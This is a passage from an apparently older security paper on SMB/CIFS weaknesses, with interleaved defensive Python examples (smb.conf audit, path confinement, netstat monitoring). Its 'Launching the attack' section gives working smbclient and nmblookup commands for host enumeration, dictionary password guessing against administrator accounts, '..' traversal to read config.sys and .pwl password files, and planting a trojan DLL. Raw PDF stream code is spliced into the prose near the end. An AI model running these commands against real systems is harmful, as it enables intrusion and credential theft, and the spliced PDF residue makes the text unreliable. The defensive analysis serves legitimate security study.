a different one is specified, say with "smbclient -U". Thus a TCon to
"\\servername\user" makes just the user's home directory and downward visible.
However, under many Samba configurations a TCon to the name of some account
whose home directory is "/" allows the client to view the server's entire
filesystem. Therefore one can user-level authenticate as "joe" but then TCon
to "root" or "bin" and explore the whole machine, albeit only as joe's Unix
UID. This also works against a share-level Samba, since we can either perform
user-level setup regardless or use the "implied user" client-name feature and
ask for the different user's sharename. A potentially worse side effect is
that a TCon to the "sharename" of a user that does not exist returns "network
name not found", while connecting to one that *does* exist either works or
returns "access denied" depending on whether the client is in as a real user
or a guest. Regardless of TCon success or failure, the extant ones also start
getting added to the visible share list for that client connection! This
allows a client to scan for valid usernames even if only logged in as a guest,
albeit at the risk of being extensively logged.
A bunch of blind TCon attempts can be made and the Samba server conveniently
collects the locally valid usernames into a viewable list.

Microsoft servers are not immune to such games either, since most Microsoft
clients make a single TCP connection and rely on the UID and integrity of the
network layer to keep user rights separated. Once a UID is valid across a
given TCP session, it can be used to mount and mess with pretty much any other
shares the server offers. The couple of known exceptions are the special NT
admin shares and Samba's guest restrictions. As CIFS support is developed for
other platforms, the same is likely to be true there too. Some new Unix
variants already have an SMB network filesystem kernel driver. Unfortunately
servers are required by the spec to place entirely too much trust in client
machines. For example, a share mounted by one particular user tends to stick
around unless specifically disconnected, and thus may be available to another
user who logs in later even if the new user normally has no account or access
rights on the *server*. A client could be compromised or network traffic
spoofed to send requests with an altered UID. It is also not entirely clear
how "isolated" the TCP connections really are from each other, suggesting that
messing around with UID/TID combinations might turn up a few surprises. The
server simply expects every client to behave itself.

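The [HOMES] behaviour above is a configuration matter on the Samba side, and
the settings that close it are the ones documented in smb.conf(5). Here is an
added example (mine, not Samba's code and not from the paper) that reads a
minimal smb.conf and reports the settings that leave the tree-connect holes
just described open, with a weak configuration beside a hardened one. Both
configurations are constructed for the example; the reader handles only plain
"key = value" lines and "[section]" headers, not Samba's include directives
or substitution macros, and it checks the parameter names as a current
smb.conf(5) spells them.

```python
# Samba accepts several spellings for some parameters; fold them to one name.
SYNONYMS = {"browsable": "browseable", "public": "guest ok", "writeable": "writable",
            "allow hosts": "hosts allow", "deny hosts": "hosts deny"}
YES = {"yes", "true", "1"}

def load_smb_conf(text):
    """Minimal smb.conf reader: [section] headers and key = value lines, keys lower-cased."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = (s.strip() for s in line.split("=", 1))
            conf[section][SYNONYMS.get(key.lower(), key.lower())] = value
    return conf

def is_yes(value):
    return value.strip().lower() in YES

def audit_smb_conf(text):
    """Return (section, parameter, why) findings for the tree-connect problems described above."""
    conf = load_smb_conf(text)
    g, findings = conf.get("global", {}), []
    if g.get("security", "").lower() != "user":
        findings.append(("global", "security", "not user-level: share passwords are guessed without delay"))
    if "hosts allow" not in g:
        findings.append(("global", "hosts allow", "unset: any source address may try every phase"))
    homes = conf.get("homes")
    excluded = (g.get("invalid users", "") + " " + (homes or {}).get("invalid users", "")).split()
    if "root" not in excluded:
        findings.append(("global", "invalid users", "root not excluded: a TCon to 'root' maps to its home, often /"))
    if homes is not None:
        if homes.get("valid users", "").strip() != "%S":
            findings.append(("homes", "valid users", "not %S: any authenticated user can TCon to another user's home"))
        if is_yes(homes.get("browseable", "yes")):
            findings.append(("homes", "browseable", "yes: the [homes] template itself appears in the share list"))
        if is_yes(homes.get("guest ok", "no")):
            findings.append(("homes", "guest ok", "yes: guest sessions may read home directories"))
    return findings

# Constructed examples for this block, not taken from any real server.
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   security = share

[homes]
   comment = Home Directories
   browseable = yes
   writable = yes
   public = yes
"""

HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   hosts allow = 10.1.2. 127.
   invalid users = root bin daemon

[homes]
   comment = Home Directories
   valid users = %S
   browseable = no
   writable = yes
   guest ok = no
"""

if __name__ == "__main__":
    for finding in audit_smb_conf(WEAK_CONF):
        print("%-6s %-14s %s" % finding)
```

"valid users = %S" ties each dynamic home share to the one account whose name
it carries, which removes the "log in as joe, TCon to root" walk through the
filesystem. It does not remove the difference between "network name not
found" for a nonexistent user and "access denied" for a real one, so Samba's
TCon-time logging stays important: a burst of tree connects to many different
service names from one client is the username scan described above.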
This was really driven home by the discovery of the now well known "dotdot"
bugs. Since most filename parsing and cleanup is left to the client, it was
found that smbclient could send requests containing filenames of the form
"..\..\CONFIG.SYS" to easily escape the confines of the share. Microsoft's
official excuse for this was that Samba is an "illegal client" and shouldn't
be used, but nonetheless released service packs with a couple of pathname
enforcement bandaids slapped on to the server code. Samba itself didn't fall
victim to this because its Unix-savvy implementors already knew long since to
check for ".." and such in pathnames! Part of the patch kit short circuits
dos_clean_name() to return without touching the given pathname, allowing us
more freedom to send arbitrary file paths and explore bugs of this sort. This
is not an automated test; one must play and examine some directories to figure
out whether a bug is being tickled or not. A fairly reliable way to automate
such a check is to examine the first entries in directory listings of "\" and
"..\" and compare file attributes; if they are different then something is not
quite right. There may be some other funky path formats that servers handle
badly; earlier versions of NT would even crash when asked for various bogus
pathnames. There are some SMB flags to indicate support for long filenames,
which may confuse servers if changed in midstream or set under a dialect that
isn't supposed to support them.

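The dotdot bugs come down to a server trusting the client to clean up its own
pathnames. As an added example (mine, not Samba's dos_clean_name() and not the
patch kit), the function below resolves a client-supplied DOS-style path
against the share root on the server side and refuses any request that would
step above it: the "..\..\CONFIG.SYS" form from the text, and a couple of the
"funky" forms the text warns about (all-dot components and drive-letter or
stream colons). Refusing rather than silently clamping to the root is a
design choice made here so that the attempt can be logged; the sample paths
at the bottom are constructed.

```python
import posixpath

def resolve_share_path(share_root, client_path):
    """Map a DOS-style path sent by an SMB client onto the share root on the server.

    Raises PermissionError for any path that would leave the share root.  Components are
    walked here instead of handed to os.path.normpath so that '..' above the root is an
    error rather than silently absorbed, and so that oddities a DOS-minded client can send
    (all-dot components, a drive letter, an alternate data stream colon) are refused outright.
    """
    parts = []
    for comp in client_path.replace("\\", "/").split("/"):
        if comp in ("", "."):
            continue  # empty (leading or doubled separator) or the current directory
        if comp == "..":
            if not parts:
                raise PermissionError("escapes share root: %r" % client_path)
            parts.pop()
        elif set(comp) == {"."} or ":" in comp:
            raise PermissionError("refusing unusual path component: %r" % client_path)
        else:
            parts.append(comp)
    return posixpath.join(share_root, *parts) if parts else share_root

def is_confined(share_root, client_path):
    """True when the path stays inside the share; False when it should be denied and logged."""
    try:
        resolve_share_path(share_root, client_path)
        return True
    except PermissionError:
        return False

if __name__ == "__main__":
    # Constructed requests against a share exported from /export/public
    for p in ("docs\\..\\README.TXT", "\\", "..\\..\\CONFIG.SYS",
              "a\\b\\..\\..\\..\\c", "...\\x", "C:\\CONFIG.SYS"):
        print("%-24r %s" % (p, "ok" if is_confined("/export/public", p) else "DENIED"))
```

With this in place the attribute-comparison check the text describes comes
out clean by construction: a listing of "..\" at the share root is denied
rather than quietly answered with the root's parent, and the denial is the
event to count per client.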
Launching the attack
====================

The preceding explanation has not really detailed the specific real-world
steps needed to implement an attack. Here we try and pull it all together.
Parameters that will vary are represented {thus}.

The attack engine is built from Samba 1.9.15p8, using the instructions and
patches given in Appendix B. You will also need some password dictionaries,
which are available from numerous repositories. If you have read this far,
it seems likely that you can handle this part.

Scan the target network for NetBIOS-aware hosts to build a list of hostnames
and IP addresses, perhaps trying a status query to a couple of them to check
for packet filtering. The rest of this summarizes probing an individual
target, whose hostname or IP address is hereafter represented by {ip}.
If a known scope ID is in use, add "-i {scopename}" to all nmblookup and
smbclient commands.

Get the target's namelist, using the "*" status query and some type-0 name
guesses if "*" doesn't work.
Directed broadcast to x.y.z.255 may be useful in rare cases if one is able to
receive all possible responses somehow; note also that the broadcast address
may not be .255 for many subnets.

    nmblookup -B {ip} -S \*
    nmblookup -B {ip} -S {dns-name}
    nmblookup -B {ip} -S WORKGROUP#0

If a machine sporting the __MSBROWSE__ name is discovered, concentrate on that
one since it potentially has a browse-list and information about its network
neighbors. Plug the returned type-0x20 name in and get a share listing. Use
an informative debug level, avoid using NT LM dialect, hide various client
info, and try some standard usernames and any type-0x3 names observed along
the way. Many targets will accept a null password, but if a real one is
needed make some basic guesses such as the computername or username. The
hacked client accepts passwords from standard input until it gets in, gets
interrupted, or hits EOF.

    smbclient -L {TARGET} -I {ip} -d 3 -n " " -m LANMAN2 -U ADMINISTRATOR
    smbclient -L {TARGET} -I {ip} -d 3 -n " " -m LANMAN2 -U ""

For the hard cases, pick a username or sharename that is likely to exist, and
level a common-password dictionary file at it. If you have not enabled the
UPPERCASE option, arrange to uppercase the dictionary first since success is
more likely. Debug level 0 makes it run silently until it gets in or exhausts
the dictionary.
To test for invalid password delays, use a higher debug level and manually
observe the timing. A sudden speedup in access errors probably indicates
account lockout and that further attempts on that account won't be useful
for at least another half an hour or so.

    smbclient -L {TARGET} -I {ip} -d 0 -n " " -m LANMAN2 \
      -U BACKUP < dictfile

Try connecting to the shares on an accessible target, testing for read/write
access, and exercising bugs.

    smbclient \\\\TARGET\\SNAME -n TRUSTME -m LANMAN2 -U JOEUSER -I {ip}
    smb: \> dir
    smb: \> md test
    smb: \> rd test
    smb: \> cd ..
    smb: \..\> dir
    smb: \..\> cd \..\..
    smb: \..\..\> dir
    smb: \..\..\> get config.sys -
    smb: \..\..\> cd windows
    smb: \..\..\windows\> get joeuser.pwl
    smb: \..\..\windows\> put trojan.dll winsock.dll

For the *really* hard cases that impose bad-password delays but allow many
attempts such as NT administrator accounts, split up [and optionally convert
to uppercase] a large dictionary and use the multi-connection hack. A
convenient way to run it is inside "script", to record the details from any
process that successfully logs in.

    script logfile
    set DOIT = "smbclient -L {TARGET} -I x.y.z.q -d 0 -n ' ' \
      -m LANMAN1 -U ADMINISTRATOR"
    $DOIT < splitdict.1 &
    $DOIT < splitdict.2 &
    $DOIT < splitdict.3 &
    $DOIT < splitdict.4 &
    ... etc, up to 10 or however many concurrent ones it can handle ...

Collect the results, write the report, submit the invoice...

Now what?
=========

Where do we go from here? If administrator-level access is gained the
possibilities are endless -- an account cracked during an attack is the same
credential needed for remote maintenance and registry editing, to install
hacked web pages and DLLs and drivers, modify startup files to run backdoor
daemons, or just wreak havoc. Access as a regular user or even guest may
permit such games as well. If the NT GUEST login is enabled, on most servers
it gets more privileges than needed unless configured otherwise.
Even
read/write guest access to /tmp on a Samba server may be dangerous if its
shell users run any of hundreds of utilities that bounce critical data in and
out of /tmp files. This document does not address problems in other services
such as FTP and Web since they are exhaustively explored in other documents,
but one should still consider the potential effects of concerted attacks on
those services *and* SMB together.

Intruders are already scanning routinely across the customer networks of
large ISPs, looking for vulnerable home PCs with technically illiterate
owners and factory-default setups. The notoriously weak .PWL files are a
popular target, and woe betide those who use them to store working passwords
for other services. The cable-TV modem systems now coming online function
just like bridged ethernets, freely allowing local broadcasts and other
shenanigans, which can turn your next door neighbor into an unintentional
intruder as his '95 box literally explores its "network neighborhood". If you
aren't scared yet, consider this scenario: You spend a day at home doing work
via telecommuting. Your company is both frugal and security-aware, and has
provided secure connectivity tools that you can use with your regular personal
ISP account to access corporate files behind the firewalls. You inadvertently
left filesharing "temporarily" turned on from something you were doing two
days ago. While you are happily SSH'ing away, someone breaks into your
machine via SMB and without your knowledge, sensitive company files and
your personal finance records are stolen, viruses planted, and your secure
connection apps compromised. Next time you use your SSH client, it quietly
spills its internal beans over the net to a stolen AOL account and within ten
minutes your internal corporate network is overrun. Since it appears that
your access credentials were involved, YOU may be held accountable. But you
didn't do anything, and were always careful with your passwords! A similar
scenario could easily occur with corporate laptops used to "get home" from
conferences and trade shows, which could still be a problem even if your
laptop is reasonably secure but the one belonging to the guy *next* to you is
compromised! Think about it...

The rest of this section wanders into a large area of blue-sky loose ends that
in large part outlines the limits of the author's current knowledge. Answers
to many of these may already be known, and if not then much is certainly left
for those with the time and inclination to explore and think over. Anyone is
free to send information concerning any of these, as well as the inevitably
needed corrections to other parts of this document.

Windows cracking tools are already starting to appear. At least one password-
snarfing DLL is in the works for NT, as are security-targeted registry editors
and NTFS tools. Daemons to listen on network ports and start backdoor command
shells probably exist already, and if nothing else there are shareware "inetd"
and telnet-server equivalents available now. Do not ask me where to get these
things, because I have no clue. Pointers, on the other hand, are always
welcome.

The \PIPE\LANMAN service is only one of several named-pipe services. The
remote registry editor starts up a new IPC TCon and opens "\PIPE\winreg" to do
its dirty. Another service type seems to be called \MAILSLOT\{various-things}
and shows up in browsing-related UDP traffic. Domain logons try to locate
services such as \NET\NETLOGON and \NET\GETDC450, mostly via broadcast UDP.
There may be many undocumented services and API calls within either class,
reminding us that Microsoft historically likes to hide ill-considered or
insecure functionality there and count on obscurity to resist attack.
There
are also the fledgling DCE/RPC services which apparently are intended to phase
out named pipes as the recommended transaction backend and clearly present
a whole 'nother swamp to explore. If it is running, some part of RPC is
reachable via TCP port 135. It seems likely that some of these services
can be accessed even if the file/printer sharing checkbox is NOT enabled.

Anyone who runs vanilla SMB over the open Internet is crazy, no matter how
good their backend server security is. The protocol runs in the clear, and is
thus just as vulnerable to TCP spoofing and hijacking as any other cleartext
session. All it takes is one properly constructed SMB packet to make an
existing authenticated session do something nasty or blow open a big hole
that an attacker can enter through, and it doesn't even matter what the
server response is or how the real client handles it -- the damage is done.
There are already known man-in-the-middle attacks against the authentication
protocol. Various SMB header fields are only 16 bits, and in addition have
been observed to be *very* predictable especially from relatively inactive
servers. For instance, Samba uses the user's own UID for its SMB UID,
and TIDs from a quiet server vary little if at all. NT seems to rather
consistently assign 2048 for both initial UIDs and TIDs, and increments by
either 1 or 2048 for new connections. This suggests that blind TCP spoofing
attacks may nonetheless be effective even if an attacker cannot observe an
existing session.

One type of TCP attack involves "desynchronizing" an existing session between
two hosts and taking over the connection. As Laurent Joncheray's paper on the
subject points out, such an attack is aided by the application protocol in
question having some element that sends data through the TCP stream but causes
no change in the state of the application itself. An example is telnet
options -- a telnet client can send any number of "do echo" commands and the
end user would never be the wiser. An attacker uses this type of "null data"
to push the TCP sequences out of each endpoint's windows, with the only side
effect being an "ack war" between the hosts as they desperately try to resync,
and eventually the attacker controls the whole connection. SMB has both an
echo and a session keepalive message, and it is likely that these could also
be used in a user-undetectable desync attack.

While separate TCP SMB sessions are supposed to be completely isolated from
each other, there is always a possibility that a server implementation could
"leak" or get them confused somehow. Servers generally run as a single
process and manage several client connections internally, but how exactly
does a given one internally reference the parameters associated with each?
The concept of "UID scanning" has been suggested, and while I personally have
my doubts about it there are still other various SMB fields to consider. We
should not discount for one moment a server giving too much credence to
client-settable header parameters like UID, TID, PID, MID, and maybe even
source TCP ports. The twelve filler bytes in TCP SMBs become relevant in
connectionless UDP mode for sorting out session IDs, and it would be no
surprise at all if the right combination of data there was able to, say,
reference an already existing TCP session. Most server platforms seem able
to talk concurrently via either transport type.

There may be some magic hidden in the calling client name and/or the username
that the client passes in. Special user accounts of the form OTHERDOMAIN$ are
used in domain trust relationships, and recent Samba servers that at least
partially support domain logins have a small hook to not turn on the "guest"
bit for this type of user login. A few remaining bits worth poking at could
include weaknesses in the Microsoft IP stack itself, as well as how well
various ill-formed service requests are handled. Sending random data to the
listening ports of various NT services such as RPC and DNS can apparently
cause them to wack out or crash, implying that genuine security holes may
lurk there as well. Snowing a site with bogus NMB name-registration and
master browser election traffic could have many interesting effects on local
workstations. SMB clients must conform with a rather rigid request structure,
but what happens if one does not? Well-known vulnerabilities such as buffer
overflows and trust of user-modifiable data keep recurring in recent network
code under numerous operating systems, and something as large and complex as
NT or '95 is undoubtedly no exception.

Besides the oft-belabored network level denial-of-service attacks possible,
there is also a potential attack written right into the CIFS spec. It states
that if a server receives a new session transport connection from a given
client, it MAY assume that a reboot occurred and summarily drop any old
existing connections with that client. Precisely what a "client" is in this
case is not well-defined, but implies that it is simply based on the claimed
client name.
Only a lunatic would write a server conformant with this, as it
would allow anyone to remotely knock down SMB sessions all day, and sensibly
enough, none of the platforms mentioned herein allow this sort of nonsense.
Most servers rely on keepalive timeouts and network-level errors to ferret out
dead client connections.

Defenses
========

It is entirely reasonable to mentally lump CIFS in the same class as NFS, and
view the security aspects of both with equal skepticism. It should be fairly
evident by now that this stuff is a real danger, and the happy kids in Redmond
aren't going to be much help here. To their credit, they have provided a few
interesting bricks you can use when building your own walls and some of these
are covered in detail in numerous books and FAQs. The transport protocol is
also fairly easy to handle with familiar IP-level defense mechanisms, making
construction of that "layered defense" more feasible. It is hoped that the
preceding bulk of this document has increased understanding of how to probe
networks for remaining NetBIOS-related weak spots.

Any text or FAQ on Windows or NT security is a good starting point for things
to change, particularly on servers. These will detail basics like disabling
or removing privileges from GUEST accounts, changing ADMINISTRATOR account
names and barring them from network logins, preventing remote registry
editing, turning off useless information-leaking services like messaging,
reassigning user and group privileges, configuring failed-login lockouts,
and dinking ACLs/ownerships on files and registry entries. Servers can be
equipped with batch files to invoke "net share ??? /DELETE" and disable
unnecessary default fileshares after a reboot. Centralized user management
via domain controllers may help mitigate some administrative nightmares, and
strong user passwords are a must although often difficult to enforce.

An obvious perimeter defense is packet filter rules in border routers to drop
traffic to TCP *and* UDP ports 135 thru 139. This prevents direct NetBIOS and
RPC attacks from the outside, but may not block a relayed proxy connection or
a curious insider.
Policy may dictate that a few filtering "holes" be left
open for remote collaborators; such things should be configured as narrowly as
possible, perhaps even down to specific host addresses, and policymakers
should understand that the data in these allowed connections can be stolen or
corrupted. Better would be an encrypting proxy relay or VPN of some sort.

If packet filtering is not an option, as at many policy-impaired sites, there
are still several worthwhile measures available that can help make your
machines "invisible" from the outside. One is to use a scope ID. These are
additional components of computernames that Microsoft incomprehensibly
recommends NOT using but provides anyway. The stated purpose is to isolate
groups of machines from each other in a more complete way than using different
workgroups. Similarly to using an obscure "domainname" under Unix YP, setting
all the machines at a site to use a non-obvious scope ID and keeping it a
secret within a site effectively provides a "site password." Any NetBIOS
traffic, name queries and session setup alike, must contain the exact same
case-sensitive scope ID or name responses aren't sent and sessions are
rejected. Scopes are by no means a panacea since they can leak out via human
vectors, and an astute attacker who observes active listeners on TCP 139 but
cannot obtain name info or sessions may conclude that a non-null scope ID is
in use and start trying to guess or social engineer for it. The scope is
easily viewed by doing "nbtstat -n" on a local console, so beware of wandering
outsiders with itchy fingers. If a site's machines are set up with scope IDs
by a small core group of maintainers who keep it to themselves, the end users
are unlikely to even notice anything different unless they specifically look
in the settings or spot them in packet dumps.

Where to set the scope name is often hidden in an obscure place. This is a
rough outline of where to find it on various platforms; RTFM for others:

    WFWG [requires restart, and happily craps into various .INI files]:
        run WINSETUP; Network settings / Drivers / MS TCP/IP / Setup /
        Advanced / Scope ID text-box

    WFWG alternate, less frustrating:
        edit SYSTEM.INI and find [NBT] section
        add a line with "ScopeID = XYZ"
        note: can also add "LMHostFile = {path}" here to enable LMHOSTS

    W95 and NT [also requires restart]:
        Control panel / Network / Protocols / TCP/IP / Properties /
        WINS Addresses / Scope ID text-box near bottom

    Samba [takes effect during server run]:
        start "smbd" with "-i XYZ" to set the scope ID

Microsoft clients and servers use the scope ID exactly as given, but Samba
always upper-cases it and must be patched if a mixed-case one is to be used.
For compatibility, "nmblookup" in the attack kit needs a similar patch,
although "smbclient" itself for some reason doesn't mess with the -i argument.
It is definitely weird that all the scope-handling hooks are already there in
Samba, but not very clearly documented or listed in usage() messages.

Another easy network-level sleaze is to not supply internal servers with a
default IP route to the internet, and make sure they ignore ICMP redirects and
routing protocols. There is little reason a dedicated local fileserver would
ever need to interact with anything offsite, and public services such as web
servers should exist on different machines anyway. Packets may still reach
such "nonrouted" machines from the outside, but they cannot send back and TCP
connection attempts to them simply time out. NT also seems to have some
rudimentary concept of its own IP packet filtering, said to offer little
versatility but may be worth investigating anyway [and TESTING if configured!]
Depending on local policy, end-user machines will probably still need to talk
to the internet so employees can waste time surfing; a wise policy is that
their machines strictly remain clients and never offer any inbound services.
Turning off the file and printer sharing checkboxes is the obvious first step,
although Microsoft stacks seem to always listen on the NetBIOS ports
regardless of these settings.

The internal protections on server shares are important, on both Microsoft
platforms and Samba alike. Placing public shares on separate drive partitions
reduces the potential damage from ".." bugs, since Microsoft servers are
reasonably good about not letting shares cross filesystem boundaries. If file
ACLs and modes are available, USE THEM so that any normal user [or a virus she
inadvertently runs] would never be able to write to, say, directories full of
common system utilities. Making entire shares read-only if possible is sound,
or if *someone* needs to write to them, separate and closely-held maintenance
accounts should only own the files and not have any administrative privileges.
While the magic [homes] Samba feature may be useful in some environments,
consider carefully if the arguably free-n-easy way it works may be too lax for
yours. A strategy worth considering is building a Samba server with custom
getpwent() routines that dig base user entries out of a file other than
/etc/passwd, which makes a cracked filesharing password considerably less
useful against other daemons on the server machine.

The logging problem is a pain in the butt. Most servers that log anything
just save the calling client's name, which is hardly useful since it can be
arbitrarily set. Running a separate network monitor on an unswitched DMZ
segment and looking for certain inbound traffic is one way to centrally cover
a motley assortment of problematic machines. Stock Microsoft platforms simply
cannot log client IP addresses at all, a possible albeit lame rationale being
that CIFS runs over several different kinds of transports and they'd all have
to be accommodated somehow. Some kind of batch job to periodically wake up and
snapshot a "netstat -a" to a logfile may help detect attacks, or by now there
may be some third-party DLLs available that provide better logging and alarms.
Samba deals more closely with IP addresses but still makes the administrator
jump through hoops to usefully log things. Under the default debug level of
1 only successful non-IPC tree connects are logged. The code also includes
an IP-based access control module ripped right out of Wietse Venema's tcp
wrappers, and can be set up to deny tree connects from all but known hosts
and subnets. The allow/deny access control entries reside in lib/smb.conf,
configured globally and/or per share entry, but they only apply to TCons and
have no effect on the underlying TCP connection itself. Using them may
nevertheless gain some peace of mind; see the documentation for serving
suggestions. Supplying an "allow" entry and cranking the debug level up to
at least 2 will cause all TCon attempts to be logged, along with a certain
quantity of other noise. A small saving grace here is that Samba by default
runs in *share* level, so an attack would take the form of repeated TCon
attempts and cause lots of logging. This is still not sufficient with user
level security. User logins are also logged at debug level 2 but only with
the client computername, and one would have to group together many log entries
to reconstruct an attack footprint. The best way to deal with Samba would be
some minimal changes to the server code, perhaps to getpeername() on the
current network socket any time a login *or* TCon is attempted and concisely
log success or failure along with the client name *and* IP address. Nmbd
could be changed to log status queries at debug level 0 instead of 3, to help
warn about UDP name-gathering probes even if the "no default route" sleaze or
scopes are in use. Sending security-critical logging to the syslog instead of
Samba's default logfiles would bring it more in line with other daemons and
maybe cause administrators to pay more attention to it.
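One way to act on the "netstat -a" snapshot idea above, as an added example that is not part of the original paper: a small Python checker that reads a snapshot (a constructed NT-style one is embedded) and counts live TCP sockets on local ports 135 through 139 whose peer falls outside assumed site prefixes. The column layout, the hostname "fileserv", the peer addresses and the LOCAL_PREFIXES list are all assumptions.

```python
"""Scan periodic "netstat -a" snapshots for inbound NetBIOS/RPC sessions
from addresses outside the site.

Added example, not code from the original paper.  The snapshot text below
is constructed to look like NT "netstat -a" output; the column layout on a
real box should be checked before trusting the parser."""
import ipaddress
from collections import Counter

# Ports the paper says to drop at the border: TCP and UDP 135 through 139.
NETBIOS_RPC_PORTS = range(135, 140)

# Assumed site prefixes (constructed); anything else counts as "outside".
LOCAL_PREFIXES = [ipaddress.ip_network("10.0.0.0/8"),
                  ipaddress.ip_network("127.0.0.0/8")]

# Constructed snapshot, one line per socket, in NT "netstat -a" style.
SAMPLE_SNAPSHOT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    fileserv:135           0.0.0.0:0              LISTENING
  TCP    fileserv:139           0.0.0.0:0              LISTENING
  TCP    fileserv:139           10.1.2.55:1031         ESTABLISHED
  TCP    fileserv:139           203.0.113.7:2049       ESTABLISHED
  TCP    fileserv:139           203.0.113.7:2050       ESTABLISHED
  TCP    fileserv:135           203.0.113.7:2051       SYN_RECEIVED
  TCP    fileserv:1028          198.51.100.9:80        ESTABLISHED
  UDP    fileserv:137           *:*
"""


def split_endpoint(endpoint):
    """Split "addr:port" into (addr, port); port is None for "*:*"."""
    addr, _, port = endpoint.rpartition(":")
    return addr, (int(port) if port.isdigit() else None)


def parse_snapshot(text):
    """Yield (proto, local_port, foreign_addr, foreign_port, state) per socket line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue  # header, blank line, or something we don't understand
        _, local_port = split_endpoint(fields[1])
        faddr, fport = split_endpoint(fields[2])
        state = fields[3] if len(fields) > 3 else ""
        yield fields[0], local_port, faddr, fport, state


def is_local(addr):
    """True for addresses inside the assumed site prefixes (or non-IP, e.g. "*")."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True
    return any(ip in net for net in LOCAL_PREFIXES)


def suspicious_peers(text):
    """Count outside hosts with live TCP sockets to local ports 135-139.

    LISTENING sockets and outbound client connections are ignored: the
    point is inbound sessions on the SMB/RPC ports, which a stock NT
    server cannot log on its own."""
    hits = Counter()
    for proto, lport, faddr, fport, state in parse_snapshot(text):
        if proto != "TCP" or state == "LISTENING":
            continue
        if lport in NETBIOS_RPC_PORTS and not is_local(faddr):
            hits[faddr] += 1
    return hits


if __name__ == "__main__":
    for peer, n in suspicious_peers(SAMPLE_SNAPSHOT).most_common():
        print(f"ALERT: {peer} has {n} inbound NetBIOS/RPC socket(s)")
```

Run against each snapshot the batch job writes and diff the peer counts between runs; a new outside peer, or a climbing count from one, is the footprint the paper says the server itself will never log.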
Tj ET Q endstream endobj 134 0 obj 5905 endobj 129 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R132 132 0 R >> >> /Contents [ 130 0 R 133 0 R ] >> endobj 136 0 obj << /Length 137 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 137 0 obj 48 endobj 138 0 obj << /Type /Font /Name /R138 /Subtype /Type1 /BaseFont /Courier >> endobj 139 0 obj << /Length 140 0 R >> stream BT /R138 10 Tf 1 0 0 1 54 708.9 Tm (Snide comments) Tj 1 0 0 1 54 698.4 Tm (==============) Tj 1 0 0 1 54 677.4 Tm (Although a primary goal has been to point out weakness in the CIFS protocol) Tj 1 0 0 1 54 666.9 Tm (and specific implementations, backhanded comments have so far [with some) Tj 1 0 0 1 54 656.4 Tm (difficulty] been kept to a minimum. Readers who are easily upset by a certain) Tj 1 0 0 1 54 645.9 Tm (amount of vendor-bashing or other no-holds-barred dissing are encouraged to) Tj 1 0 0 1 54 635.4 Tm (skip this section, where we bump up the nasty level. Why? Because it needs) Tj 1 0 0 1 54 624.9 Tm (to be stated, partially with the hope of getting certain people to WAKE UP.) Tj 1 0 0 1 54 614.4 Tm (Some of this is certainly conjecture, but guesses made here are reasonably) Tj 1 0 0 1 54 603.9 Tm (educated.) Tj 1 0 0 1 54 582.9 Tm (Experienced Unix people are likely to already understand many of these issues,) Tj 1 0 0 1 54 572.4 Tm (and know the "been there, done that, fixed the code" feeling. It is sadly) Tj 1 0 0 1 54 561.9 Tm (evident that many people running all-Microsoft shops are way behind the curve) Tj 1 0 0 1 54 551.4 Tm (where overall network security is concerned, and still struggling with a lot) Tj 1 0 0 1 54 540.9 Tm (of the basics. Some sites don't know or care, as long as they can get their) Tj 1 0 0 1 54 530.4 Tm (electronic ad agencies connected and sell lots of that web-slum real estate) Tj 1 0 0 1 54 519.9 Tm (with the spiffy pictures and no content. 
We hear of things like complete
trust placed in obscurity measures such as "inside" RAS dialups. Those who
are starting to play with firewalls often pull such classic stunts as
connecting one in parallel with a regular router and relying on default
routing entries on individual hosts to send traffic to the firewall first.
Blocking relevant IP traffic is often met with managerial resistance or
confusion. Standard IP-level attacks work against such sites because most of
them do not really understand TCP/IP, and do not have any useful network
monitoring gear available. Unix is just foreign and scary, particularly to
these so-called experts who are now popping out of the woodwork and mindlessly
repeating that laughable lie about NT's C2 rating. These same people will
tell you how no-brainer bugs like ".." and wide-open registry permissions
are new and hot, but fall right over when asked about crypto algorithms or
wire-level packet structure. Try mentioning how NetBIOS is just a load of
CACA to such an expert, and expect a blank look in return.

Unix-savvy folks nowadays are used to having source for their operating
systems, especially where there are security concerns, or at least are easily
able to implement replacements and enhancements to the weak vendor-supplied
stuff. Microsoft not only makes this unavailable and difficult, it relies
heavily on internal obscurity and deliberate lack of documentation as part of
security architecture. Since Microsoft refuses to help even when asked, the
Samba developers have had to go through many contortions and waste a lot of
valuable time reverse-engineering things just to support certain features. A
reader can *feel* the triumph in those occasional messages to the Samba list
when someone works out one of those "undocumented Microsoft" things and
submits a patch. Security is often an arms race, which Microsoft is simply
escalating and making worse for everyone by producing yet more flimsy
obscurity. If it is not there already, NT source code will eventually hit
underground circulation as ubiquitously as that of other "proprietary"
operating systems. We should expect that numerous exploits of the obscurity
will have even the security-concerned sites falling like dominoes.

As we review some of its more blatant failings, the fundamental design of CIFS
authentication quickly becomes ridiculous. The draft even describes several
potentially serious security problems, but inexplicably makes no attempt to
FIX them. Part of the Internet-drafts process is to design and standardize
new protocols that move the industry forward, not to mire it in outdated toy
protocols that place it at risk! There is no documented way for server-end
enforcement of secure authentication methods, and no way to provide for *both*
user-level and share-level modes. At least two easy MITM attacks make the
challenge-response protocol fall, and it can also be dictionary attacked in
separate piecemeal DES blocks. Different users with different privileges can
wind up sharing a single TCP connection, which violates one of the more
traditional [albeit still insecure] ways of holding users apart. CIFS seems
to have no provision for fully encrypted sessions, despite the fact that
client and server already share at least one secret key and a few minor
enhancements to SMB could provide real session encryption. It is clear that
those behind CIFS are still mentally locked into the single user per client
model, since the issues raised by multiuser operating systems were evidently
never considered. It is almost criminal that other vendors are being forced
by market pressure to waste untold development dollars supporting this mess.

Perhaps Microsoft is nonetheless starting to acknowledge that *something*
needs to be done to replace the existing mockery of an authentication system.
